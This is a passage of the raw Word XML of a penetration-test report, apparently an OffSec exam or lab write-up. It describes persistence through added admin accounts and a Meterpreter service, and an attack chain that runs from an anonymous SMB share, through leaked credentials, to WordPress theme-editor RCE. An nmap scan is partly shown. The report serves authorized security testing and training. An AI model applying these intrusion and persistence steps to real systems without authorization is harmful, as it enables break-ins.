      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDCCF6"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The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.  In some cases, some ports may not be listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ACCFB0" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_2s8eyo1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>3.3 Penetration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A85002"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The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1211A0" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_17dp8vu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>3.4 Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B0A1B"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Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFF85A1"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 xml:space="preserve">John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> service was installed on the machine to ensure that additional access could be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B62078" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_3rdcrjn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t>3.5 House Cleaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108712B"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 xml:space="preserve">The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meticulous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and no remnants of our penetration test are left over is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA1C5E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should not have to remove any user accounts or services from the system.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblInd w:w="-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9000"/>
        <w:gridCol w:w="355"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB67CB" w14:paraId="71CF173D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="11440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a0"/>
              <w:tblW w:w="935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9000"/>
              <w:gridCol w:w="355"/>
            </w:tblGrid>
            <w:tr w:rsidR="00CB67CB" w14:paraId="1B7939AE" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="11440"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9000" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                </w:tcPr>
                <w:p w14:paraId="39956EAD" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading1"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:r>
                    <w:lastRenderedPageBreak/>
                    <w:t>4. Independent Challenges</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="34C3AF80" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading2"/>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="1"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:bookmarkStart w:id="12" w:name="_26in1rg" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="12"/>
                  <w:r>
                    <w:t>4.1 Target #1 – 192.168.232.55</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5230945F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="13" w:name="_lnxbz9" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="13"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">4.1.1 Initial Access – Anonymous SMB share leads to </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> RCE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2CB8D64E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Explanation:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> The SMB server is not protected with the password and has some sensitive information like credentials stored. Which leads to RCE from </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> theme editor.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4A02475A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Fix:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> The SMB should be configured with credentials and guest enumeration should be disabled.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="54781971" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Severity: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Critical</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E74E469" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Steps to reproduce the attack:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Ran the initial service scan John discovered that this host is called </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Sehnzi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">. </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Smbclient</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> was used to interact on the port 445 to get the passwords.txt file from SMB share </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>shenzi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and used those credentials for </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> admin access.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="056B5A41" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="14" w:name="_35nkun2" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="14"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>4.1.1 Service Enumeration</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="02721562" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Port Scan Results</w:t>
                  </w:r>
                </w:p>
                <w:tbl>
                  <w:tblPr>
                    <w:tblStyle w:val="a1"/>
                    <w:tblW w:w="886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9"/>
                    <w:gridCol w:w="7142"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="3239A506" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1719" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="6DAAF2B1" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>IP Address</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="7142" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="522D62F1" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>Ports Open</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="306947AE" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1719" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="687C991D" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t>192.168.232.55</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="7142" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="0F0AE7BF" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>TCP</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t>: 21, 80, 135, 139, 443, 3306, 49666</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="51EFA804" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">We run </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>nmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> to scan the target and found a few ports open.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="720D7811"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nmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 192.168.232.55 -p- --min-rate 20000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="09C4237C"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Starting Nmap 7.93 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>( https://nmap.org</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ) at 2023-11-17 10:28 +04</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4491F089"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Warning: 192.168.232.55 giving up on port because retransmission cap hit (10).</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2DC5A338"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Nmap scan report for 192.168.232.55</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="121360F5"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Host is up (0.27s latency).</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0C7B40AB"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Not shown: 48865 filtered </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ports (no-response), 16662 closed </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ports (conn-refused)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6F6C934B"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PORT      STATE SERVICE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="335BA6C6"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21/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>open  ftp</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="5E19BD97"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80/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>open  http</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
